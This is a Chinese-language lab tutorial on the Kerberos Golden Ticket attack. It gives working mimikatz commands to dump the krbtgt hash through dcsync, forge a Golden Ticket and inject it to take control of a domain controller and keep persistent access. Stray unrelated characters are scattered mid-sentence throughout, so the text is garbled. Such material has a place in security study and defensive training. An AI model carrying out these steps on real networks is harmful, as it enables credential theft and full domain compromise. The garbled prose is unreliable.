前言
在橫向滲透中,利用Ticket票據進行橫向常常用在域環(huán)境里氧苍。常見的有三種攻擊方式:ms14-068夜矗、Golden Ticket(黃金票據)、Silver Ticket(白銀票據)
我們今天學習Golden Ticket(黃金票據)
概念
在了解了kerberos協(xié)議让虐,Client和Server通信大概經過三次認證紊撕。具體參考之前學習的kerberos認證學習。Client通過了第一次AS認證赡突,返回給TGT用于第二次認證对扶。
如果TGT被偽造,即跳過了AS認證惭缰,直接進行第二次認證浪南,就可以和任意的Server進行通信。而偽造的TGT叫做黃金票據漱受,也被稱為認證票據络凿。
原理
那么TGT如何偽造呢?就得看一下TGT是怎么產生的昂羡。是在第一次認證中絮记,KDC返回給Client兩部分內容。
一部分:Client NTLM-Hash 加密的Session-key as
一部分:TGT(krbtgt 域賬戶的NTLM Hash 加密的Session-key as紧憾、 Client-info到千、timestamp)
也就是當我們擁有krbtgt 域賬號NTLM-Hash的情況下,即獲取域管理員權限赴穗。就可以偽造黃金票據(Golden TGT)
利用條件
krbtgt NTLM-Hash:僅保存在域控服務器的活動目錄中憔四。也就是說我們需要獲取域控制器的權限。
域賬戶名稱:通常是域管理員Administrator
域名稱
域SID
導出krbtgt皆有以上信息
黃金票據般眉,通常在拿下域控后用來作權限維持的一種方式了赵。因為krbtgt 域賬戶的密碼基本不會更改,即使域管密碼被修改甸赃,它也不會改變柿汛。
偽造黃金票據
實驗環(huán)境
域控制器:Server 2012
域用戶:Server 2008
1.獲取krbtgt 域賬戶的NTLN-Hash
在域控上mimikatz導出krbtgt hash
mimikatz log "lsadump::dcsync /domain:tide.org /user:krbtgt"
可看到以下信息
Hash NTLM : 264d69c269433dacf814799a4e6e92e5
SID: S-1-5-21-1082813543-4064396809-3123302706 不要RID值(502)
domain: tide.org
2.生成黃金票據
在域用戶server 2008 上使用mimikatz生成黃金票據
kerberos::purge 清空緩存
kerberos::golden /admin:Administrator /domain:tide.org /sid:S-1-5-21-1082813543-4064396809-3123302706 /krbtgt:264d69c269433dacf814799a4e6e92e5 /ticket:Administrator.kiribi
執(zhí)行后會生成Administrator.kiribi
3. 偽造黃金票據獲取域控權限
mimikatz導入該黃金票據
kerberos::ptt Administrator.kiribi
即可獲得域控權限。
